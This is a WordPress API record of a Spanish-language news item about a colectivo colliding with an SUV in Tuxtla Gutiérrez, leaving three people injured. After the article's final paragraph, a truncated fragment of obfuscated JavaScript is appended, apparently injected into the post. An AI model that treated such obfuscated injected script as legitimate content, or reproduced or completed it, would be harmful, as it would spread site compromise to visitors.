{"id":23724,"date":"2025-09-02T06:24:58","date_gmt":"2025-09-02T06:24:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23724"},"modified":"2025-09-02T06:24:59","modified_gmt":"2025-09-02T06:24:59","slug":"choque-entre-colectivo-y-particular-deja-tres-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23724","title":{"rendered":"Choque entre colectivo y particular deja tres heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310700-1024x576.jpg\" alt=\"\" class=\"wp-image-23725\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310700-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310700-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310700-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/09\/1000310700.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 1 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Un choque entre una unidad de transporte p\u00fablico en la modalidad de colectivo de la ruta 126-28 y una camioneta Dodge Durango de color blanco dej\u00f3 como saldo cuantiosos da\u00f1os materiales y tres heridos.<\/p>\n\n\n\n<p>De acuerdo con los datos oficiales este hecho ocurri\u00f3 cuando el colectivo circulaba de Oriente a Poniente a la altura de la 10a Poniente cuando la unidad particular sali\u00f3 del acotamiento sin precauci\u00f3n y le hizo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>Por el choque tres pasajeros del colectivo resultaron lesionados.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de tr\u00e1nsito para tomar dato de lo sucedido.<\/p>\n\n\n\n<p>Param\u00e9dicos atendieron a los lesionados.<\/p>\n\n\n\n<p>Finalmente los conductores llegaron a un acuerdo para evitar problemas legales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 1 de septiembre del 2025. Tuxtla Guti\u00e9rrez.- Un choque entre una unidad de transporte p\u00fablico en la modalidad de colectivo de la ruta 126-28 y una camioneta Dodge Durango de color blanco dej\u00f3 como saldo cuantiosos da\u00f1os materiales y tres heridos. De acuerdo con los datos oficiales este hecho ocurri\u00f3 cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23725,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-23724","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23724","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23724"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23724\/revisions"}],"predecessor-version":[{"id":23726,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23724\/revisions\/23726"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23725"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23724"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23724"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23724"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}